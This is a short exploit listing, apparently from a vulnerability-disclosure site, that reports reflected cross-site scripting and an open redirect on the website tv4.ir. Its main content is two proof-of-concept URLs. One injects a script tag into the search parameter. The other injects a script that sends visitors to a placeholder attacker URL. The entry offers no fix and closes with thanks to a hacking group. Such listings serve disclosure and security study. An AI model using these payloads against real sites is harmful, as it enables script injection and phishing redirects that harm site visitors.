Tv4.ir Open Redirect And Cross Site Scripting (XSS) Vulnerability

2018.01.19
ir Iran.Anonymous (IR) ir
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Tv4.ir Xss and Open Redirect Vulnerability # Google Dork: N/A # Date: 2018/01/17 # Exploit Author: iranonymous # Vendor Homepage: http://tv4.ir/ # Tested on: Windows ******************************************* # vulnerability : The vulnerability is in the header that the attacker can access sensitive information using script code and cause a problem. ******************************************* # Proof Xss : http://tv4.ir/search?q=%22%3E%3Cscript%3Ealert(/Xss%20By%20iranonymous/)%3C/script%3E # Proof Open Redirec : http://tv4.ir/search?q=<script>window.location ="http://attacker-url"</script> ******************************************* # Thanks to : ~~> MR.Khatar || Turk.Khan || Blackwolf_Iran ||Ormazd || Sh@d0w ||Hellish_PN (mamad khodesh) ||Rabinson || Danger BoY # Discovered By: Iran.Anonymous


See this note in RAW Version
Vote for this issue:
83%
17%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top